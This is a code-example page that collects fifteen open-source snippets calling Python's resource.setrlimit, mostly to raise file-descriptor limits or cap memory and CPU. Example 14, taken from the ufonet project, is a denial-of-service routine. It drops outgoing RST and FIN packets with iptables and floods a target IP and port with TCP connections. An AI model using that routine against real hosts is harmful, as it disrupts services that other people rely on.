

Python resource.setrlimit Function Code Examples

This article collects and summarizes typical usage examples of Python's resource.setrlimit function. If you are wondering what exactly setrlimit does, how to call it, or what real-world setrlimit code looks like, the hand-picked examples below should help.


The following presents 15 code examples of the setrlimit function, sorted by popularity by default.
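
Before going through the examples, here is a minimal, self-contained sketch of the pattern most of them follow: read the current (soft, hard) pair with resource.getrlimit, then raise the soft limit with resource.setrlimit without exceeding the hard limit. This is an illustrative sketch only; the helper name raise_soft_limit and the target value 4096 are arbitrary choices, not taken from any of the projects below.

import resource

def raise_soft_limit(which=resource.RLIMIT_NOFILE, target=4096):
    """Raise the soft limit toward `target`, never above the hard limit."""
    soft, hard = resource.getrlimit(which)      # current (soft, hard) pair
    if hard != resource.RLIM_INFINITY:
        target = min(target, hard)              # the soft limit may not exceed the hard limit
    if soft == resource.RLIM_INFINITY or soft >= target:
        return soft, hard                       # already high enough, nothing to do
    # Only the soft limit is raised; the hard limit is left untouched because an
    # unprivileged process cannot raise it again once it has been lowered.
    resource.setrlimit(which, (target, hard))
    return resource.getrlimit(which)

if __name__ == "__main__":
    print(raise_soft_limit())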

Example 1: test_configurations_signed_data

    def test_configurations_signed_data(self):
        # Use a limit of ~4GiB
        limit = 4000 * 1024 * 1024
        resource.setrlimit(resource.RLIMIT_AS, (limit, limit))

        cs = ParamSklearnClassifier.get_hyperparameter_search_space(
            dataset_properties={'signed': True})

        print(cs)

        for i in range(10):
            config = cs.sample_configuration()
            config._populate_values()
            if config['classifier:passive_aggressive:n_iter'] is not None:
                config._values['classifier:passive_aggressive:n_iter'] = 5
            if config['classifier:sgd:n_iter'] is not None:
                config._values['classifier:sgd:n_iter'] = 5

            X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits')
            cls = ParamSklearnClassifier(config, random_state=1)
            print(config)
            try:
                cls.fit(X_train, Y_train)
                X_test_ = X_test.copy()
                predictions = cls.predict(X_test)
                self.assertIsInstance(predictions, np.ndarray)
                predicted_probabilities = cls.predict_proba(X_test_)
                self.assertIsInstance(predicted_probabilities, np.ndarray)
            except ValueError as e:
                if "Floating-point under-/overflow occurred at epoch" in \
                       e.args[0] or \
                       "removed all features" in e.args[0] or \
                                "all features are discarded" in e.args[0]:
                    continue
                else:
                    print(config)
                    print(traceback.format_exc())
                    raise e
            except RuntimeWarning as e:
                if "invalid value encountered in sqrt" in e.args[0]:
                    continue
                elif "divide by zero encountered in" in e.args[0]:
                    continue
                elif "invalid value encountered in divide" in e.args[0]:
                    continue
                elif "invalid value encountered in true_divide" in e.args[0]:
                    continue
                else:
                    print(config)
                    print(traceback.format_exc())
                    raise e
            except UserWarning as e:
                if "FastICA did not converge" in e.args[0]:
                    continue
                else:
                    print(config)
                    print(traceback.format_exc())
                    raise e
            except MemoryError as e:
                continue
Developer: automl, Project: paramsklearn, Lines: 60, Source: test_classification.py

Example 2: _restore_rlimits

    def _restore_rlimits(self):
        try:
            import resource

            resource.setrlimit(resource.RLIMIT_NOFILE, (self.soft_max_open_files, self.hard_max_open_files))
        except ImportError:
            pass
Developer: djay0529, Project: mdanalysis, Lines: 7, Source: test_analysis.py

Example 3: init_tests

    def init_tests(self):
        """ Initialize testing infrastructure - sockets, resource limits, etc. """
        # Init Twisted factory.
        self.server_factory = network.TestServerFactory(controller = self)
        #self.client_factory = TestClientFactory(controller = self)

        # Sort to try privileged ports first, since sets have no
        # guaranteed ordering.
        ports = sorted(self.test_ports)
        log.notice("Binding to test ports: %s", ", ".join(map(str, ports)))
        for port in ports:
            reactor.listenTCP(port, self.server_factory)

        # Set RLIMIT_NOFILE to its hard limit; we want to be able to
        # use as many file descriptors as the system will allow.
        # NOTE: Your soft/hard limits are inherited from the root user!
        # The root user does NOT always have unlimited file descriptors.
        # Take this into account when editing /etc/security/limits.conf.
        (soft, hard) = resource.getrlimit(resource.RLIMIT_NOFILE)
        log.verbose1("RLIMIT_NOFILE: soft = %d, hard = %d", soft, hard) 
        if soft < hard:
            log.debug("Increasing RLIMIT_NOFILE soft limit to %d.", hard)
            resource.setrlimit(resource.RLIMIT_NOFILE, (hard, hard))                

        log.debug("Initializing test threads.")
        # TODO: Configure me!
        scheduler_class = getattr(scheduler, config.scheduler)
        self.scheduler = scheduler_class(controller = self,
                                         max_pending_factor = config.max_pending_factor,
                                         export_interval = config.export_interval)
        T = threading.Thread
        self.schedule_thread = T(target = Controller.test_schedule_thread,
                                 name = "Scheduler", args = (self,))
        self.watchdog_thread = T(target = Controller.watchdog,
                                 name = "Watchdog", args = (self,))
Developer: codarrenvelvindron, Project: torbel, Lines: 35, Source: controller.py

Example 4: set_open_files_limit

def set_open_files_limit(desired_limit):
    """
    On POSIX systems, set the open files limit to the desired number, unless
    it is already equal to or higher than that.

    Setting a high limit enables Flintrock to launch or interact with really
    large clusters.

    Background discussion: https://github.com/nchammas/flintrock/issues/81
    """
    soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_NOFILE)

    if soft_limit < desired_limit:
        if desired_limit > hard_limit:
            warnings.warn(
                "Flintrock cannot set the open files limit to {desired} "
                "because the OS hard limit is {hard}. Going with {hard}. "
                "You may have problems launching or interacting with "
                "really large clusters."
                .format(
                    desired=desired_limit,
                    hard=hard_limit),
                category=RuntimeWarning,
                stacklevel=2)
        resource.setrlimit(
            resource.RLIMIT_NOFILE,
            (min(desired_limit, hard_limit), hard_limit))
Developer: nchammas, Project: flintrock, Lines: 27, Source: flintrock.py

Example 5: process_limit

    def process_limit(self):
        # If our parent has changed, commit suicide
        if self.ppid != os.getppid():
            _logger.info("Worker (%s) Parent changed", self.pid)
            self.alive = False
        # check for lifetime
        if self.request_count >= self.request_max:
            _logger.info("Worker (%d) max request (%s) reached.", self.pid, self.request_count)
            self.alive = False
        # Reset the worker if it consumes too much memory (e.g. caused by a memory leak).
        rss, vms = memory_info(psutil.Process(os.getpid()))
        if vms > config['limit_memory_soft']:
            _logger.info('Worker (%d) virtual memory limit (%s) reached.', self.pid, vms)
            self.alive = False      # Commit suicide after the request.

        # VMS and RLIMIT_AS are the same thing: virtual memory, a.k.a. address space
        soft, hard = resource.getrlimit(resource.RLIMIT_AS)
        resource.setrlimit(resource.RLIMIT_AS, (config['limit_memory_hard'], hard))

        # SIGXCPU (exceeded CPU time) signal handler will raise an exception.
        r = resource.getrusage(resource.RUSAGE_SELF)
        cpu_time = r.ru_utime + r.ru_stime
        def time_expired(n, stack):
            _logger.info('Worker (%d) CPU time limit (%s) reached.', self.pid, config['limit_time_cpu'])
            # We don't commit suicide in this case
            raise Exception('CPU time limit exceeded.')
        signal.signal(signal.SIGXCPU, time_expired)
        soft, hard = resource.getrlimit(resource.RLIMIT_CPU)
        resource.setrlimit(resource.RLIMIT_CPU, (cpu_time + config['limit_time_cpu'], hard))
Developer: befks, Project: odoo, Lines: 29, Source: server.py

Example 6: get_contest

    def get_contest(self):
        """See docstring in class Loader.

        """
        # Unset stack size limit
        resource.setrlimit(resource.RLIMIT_STACK, (resource.RLIM_INFINITY,
                                                   resource.RLIM_INFINITY))

        self.buildpath = os.path.join(self.path, "build")
        # We have to avoid copying the folder contest/build
        # or contest/task/build into contest/build.
        # For this reason, we ignore all files and directories named "build"
        # when copying recursively.
        copyrecursivelyifnecessary((self.path), self.buildpath,
                                   set(["build"]))
        with chdir(self.buildpath):
            rules = ".rules"
            if not os.path.exists(rules):
                os.mkdir(rules)
            rules = os.path.abspath(rules)
            self.contestconfig = ContestConfig(rules,
                                               os.path.basename(self.path))
            self.contestconfig._readconfig("contest-config.py")
            tasknames = [t.name for t in self.contestconfig.tasks]
            usernames = [u.username for u in self.contestconfig.users]
            return self.contestconfig._makecontest(), tasknames, usernames
Developer: ioi-germany, Project: cms, Lines: 26, Source: GerLoader.py

Example 7: launch_downloader_daemon

def launch_downloader_daemon():
    # Increase the maximum file descriptor count (to the max)
    # NOTE: the info logging is REQUIRED for some unknown reason, if it is not
    # done here, no further logging can be done in the daemon and it gets stuck.
    try:
        import resource
        logging.info('Increasing file descriptor count limit in Downloader')
        resource.setrlimit(resource.RLIMIT_NOFILE, (10240, -1))
    except ValueError:
        logging.warn('setrlimit failed.')

    # Make sure we don't leak from the downloader eventloop
    from miro import eventloop

    def beginLoop(loop):
        loop.pool = Foundation.NSAutoreleasePool.alloc().init()
    eventloop.connect('begin-loop', beginLoop)
    eventloop.connect('thread-will-start', beginLoop)

    def endLoop(loop):
        del loop.pool
    eventloop.connect('end-loop', endLoop)
    eventloop.connect('thread-did-start', endLoop)
    
    # And launch
    from miro.dl_daemon import Democracy_Downloader
    Democracy_Downloader.launch()

    # Wait for the event loop thread to finish.
    # Although this is theoretically not necessary since the event loop thread is
    # a non-daemon thread, situations where the downloader daemon exits right
    # after its launch as this function returns have been seen in the wild.
    eventloop.join()
Developer: cool-RR, Project: Miro, Lines: 33, Source: Miro.py

Example 8: limit

	def limit(self):
		resource.setrlimit(resource.RLIMIT_AS, (self.memorylimit.value, self.memorylimit.value + 16777216))
		resource.setrlimit(resource.RLIMIT_CPU, (self.cpulimit.value, self.cpulimit.value + 1.0))
		os.chroot("/tmp/pjudge/")
		os.setgid(305)
		os.setuid(305)
		return 0
Developer: jackyyf, Project: pjudge, Lines: 7, Source: judge.py

Example 9: testClushConfigSetRlimit

    def testClushConfigSetRlimit(self):
        """test CLI.Config.ClushConfig (setrlimit)"""
        soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
        hard2 = min(32768, hard)
        f = tempfile.NamedTemporaryFile(prefix='testclushconfig')
        f.write("""
[Main]
fanout: 42
connect_timeout: 14
command_timeout: 0
history_size: 100
color: auto
fd_max: %d
verbosity: 1
""" % hard2)

        f.flush()
        parser = OptionParser("dummy")
        parser.install_display_options(verbose_options=True)
        parser.install_connector_options()
        options, _ = parser.parse_args([])
        config = ClushConfig(options, filename=f.name)
        self.assert_(config != None)
        display = Display(options, config)
        self.assert_(display != None)

        # force a lower soft limit
        resource.setrlimit(resource.RLIMIT_NOFILE, (hard2/2, hard))
        # max_fdlimit should increase soft limit again
        set_fdlimit(config.fd_max, display)
        # verify
        soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
        self.assertEqual(soft, hard2)
        f.close()
Developer: jasonshih, Project: clustershell, Lines: 34, Source: CLIConfigTest.py

Example 10: setlimits

def setlimits():
    cpu_limit = current_app.config.get('SKYLINES_SUBPROCESS_CPU', 120)
    mem_limit = current_app.config.get('SKYLINES_SUBPROCESS_MEMORY', 256) \
        * 1024 * 1024

    resource.setrlimit(resource.RLIMIT_CPU, (cpu_limit, cpu_limit * 1.2))
    resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit * 1.2))
Developer: imclab, Project: skylines, Lines: 7, Source: analysis.py

Example 11: __set_max_open_files

    def __set_max_open_files(self):
        # Let's check to see how our max open files(ulimit -n) setting is
        mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
        log.info(
            'Current values for max open files soft/hard setting: '
            '{0}/{1}'.format(
                mof_s, mof_h
            )
        )
        # Let's grab, from the configuration file, the value to raise max open
        # files to
        mof_c = self.opts['max_open_files']
        if mof_c > mof_h:
            # The configured value is higher than what's allowed
            log.warning(
                'The value for the \'max_open_files\' setting, {0}, is higher '
                'than what the user running salt is allowed to raise to, {1}. '
                'Defaulting to {1}.'.format(mof_c, mof_h)
            )
            mof_c = mof_h

        if mof_s < mof_c:
            # There's room to raise the value. Raise it!
            log.warning('Raising max open files value to {0}'.format(mof_c))
            resource.setrlimit(resource.RLIMIT_NOFILE, (mof_c, mof_h))
            mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
            log.warning(
                'New values for max open files soft/hard values: '
                '{0}/{1}'.format(mof_s, mof_h)
            )
Developer: abh, Project: salt, Lines: 30, Source: master.py

Example 12: initialize

    def initialize(self):
        # initialize the base class
        GPP_base.initialize(self)
        self._popen_lock = threading.Lock()

        # Setup the TMPDIR environment variable for use in diskCapacity requests
        if not os.environ.has_key("TMPDIR"):
            os.environ["TMPDIR"] = tempfile.gettempdir()

        nproc = resource.getrlimit(resource.RLIMIT_NPROC)
        if nproc[0] < nproc[1]:
            # Max the soft limit out
            resource.setrlimit(resource.RLIMIT_NPROC, (nproc[1], nproc[1]))
        if nproc[1] < 1024:
            self._log.warning("Your system nproc hard limit [%s] is set abnormally low", nproc[1])

        ######################
        # Set initial capacities
        self.memCapacity = int(self.memTotal * self.memThresholdDecimal)    # starts out as the same value
        self.loadCapacity = self.loadTotal * self.loadThresholdDecimal
        self.mcastnicIngressCapacity = int(self.mcastnicIngressTotal * self.mcastNicThresholdDecimal)
        self.mcastnicEgressCapacity = int(self.mcastnicEgressTotal * self.mcastNicThresholdDecimal)
        self.init_processor_flags()

        self.next_property_event = None

        self.start()
Developer: VenturaSolutionsInc, Project: framework-GPP, Lines: 27, Source: GPP.py

Example 13: action

    def action(self):
        '''
        Return the functions and the returners loaded up from the loader
        module
        '''
        # if this is a *nix system AND modules_max_memory is set, lets enforce
        # a memory limit on module imports
        # this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
        modules_max_memory = False
        if self.opts.value.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
            log.debug(
                    'modules_max_memory set, enforcing a maximum of {0}'.format(
                        self.opts.value['modules_max_memory'])
                    )
            modules_max_memory = True
            old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
            rss, vms = psutil.Process(os.getpid()).get_memory_info()
            mem_limit = rss + vms + self.opts.value['modules_max_memory']
            resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
        elif self.opts.value.get('modules_max_memory', -1) > 0:
            if not HAS_PSUTIL:
                log.error('Unable to enforce modules_max_memory because psutil is missing')
            if not HAS_RESOURCE:
                log.error('Unable to enforce modules_max_memory because resource is missing')

        self.opts.value['grains'] = salt.loader.grains(self.opts.value)
        self.grains.value = self.opts.value['grains']
        self.modules.value = salt.loader.minion_mods(self.opts.value)
        self.returners.value = salt.loader.returners(self.opts.value, self.modules.value)

        # we're done, reset the limits!
        if modules_max_memory is True:
            resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
Developer: AccelerationNet, Project: salt, Lines: 33, Source: core.py

Example 14: nukeize

def nukeize(ip, port, rounds):
    n=0
    try: # per RFC 793, no exception is raised if the reset is not sent
        resource.setrlimit(resource.RLIMIT_NOFILE, (100000, 100000)) # modify kernel ulimit to: 100000
        os.system("iptables -A OUTPUT -d %s -p tcp --dport %d --tcp-flags RST RST -j DROP"%(ip, port)) # modify IPTABLES
        os.system("iptables -A OUTPUT -d %s -p tcp --dport %d --tcp-flags FIN FIN -j DROP"%(ip, port))
        epoll = select.epoll()
        connections = {}
        for x in range (0,int(rounds)):
            try:
                n=n+1
                s = connect(ip, port)
                print "[Info] [AI] [NUKE] Firing 'nuke' ["+str(n)+"] -> [SHOCKING!]"
                connections[s.fileno()] = s 
                epoll.register(s.fileno(), select.EPOLLOUT|select.EPOLLONESHOT)
                while True:
                    n=n+1
                    events = epoll.poll(1)
                    for fileno, event in events:
                        s = connections.pop(s.fileno())
                        print "[Info] [AI] [NUKE] Firing 'nuke' ["+str(n)+"] -> [SHOCKING!]"
                        if s:
                            s.close()
                            s = connect(ip, port)
                            connections[s.fileno()] = s
                            epoll.register(s.fileno(), select.EPOLLOUT|select.EPOLLONESHOT)                
            except:
                print "[Error] [AI] [NUKE] Failed to engage with 'nuke' ["+str(n)+"]"
        os.system('iptables -D OUTPUT -d %s -p tcp --dport %d --tcp-flags FIN FIN -j DROP' %(ip, port)) # restore IPTABLES
        os.system('iptables -D OUTPUT -d %s -p tcp --dport %d --tcp-flags RST RST -j DROP' %(ip, port))
    except:
        print("[Error] [AI] [NUKE] Failing to engage... -> Is still target online? -> [Checking!]")
Developer: epsylon, Project: ufonet, Lines: 32, Source: nuke.py

Example 15: set_limits

 def set_limits ():
     import resource as r
     if self.cpu > 0:
         r.setrlimit (r.RLIMIT_CPU, [self.cpu, self.cpu])
     if self.mem > 0:
         mem_bytes = self.mem * 1024 * 1024
         r.setrlimit (r.RLIMIT_AS, [mem_bytes, mem_bytes])
Developer: edmcman, Project: seahorn, Lines: 7, Source: __init__.py
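
Several of the examples above (for instance 5, 8, 10 and 15) apply limits to a worker or child process rather than to the main interpreter. As a closing illustration, here is a minimal, hedged sketch of that pattern using subprocess.Popen with preexec_fn, so the caps take effect only in the child process; the 30-second CPU cap and 256 MiB address-space cap are arbitrary illustrative values, not taken from the projects above.

import resource
import subprocess

def _apply_child_limits():
    # Runs in the child between fork() and exec(); the parent process is unaffected.
    resource.setrlimit(resource.RLIMIT_CPU, (30, 30))                 # CPU seconds
    resource.setrlimit(resource.RLIMIT_AS, (256 * 1024 * 1024,) * 2)  # address space, in bytes

proc = subprocess.Popen(["python", "-c", "print('hello')"],
                        preexec_fn=_apply_child_limits)
proc.wait()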


Note: The resource.setrlimit examples in this article were compiled by 纯净天空 from open-source code and documentation platforms such as GitHub and MSDocs. The code snippets are drawn from open-source projects contributed by their respective authors, and copyright remains with the original authors; please consult each project's License before distributing or using the code. Do not reproduce this article without permission.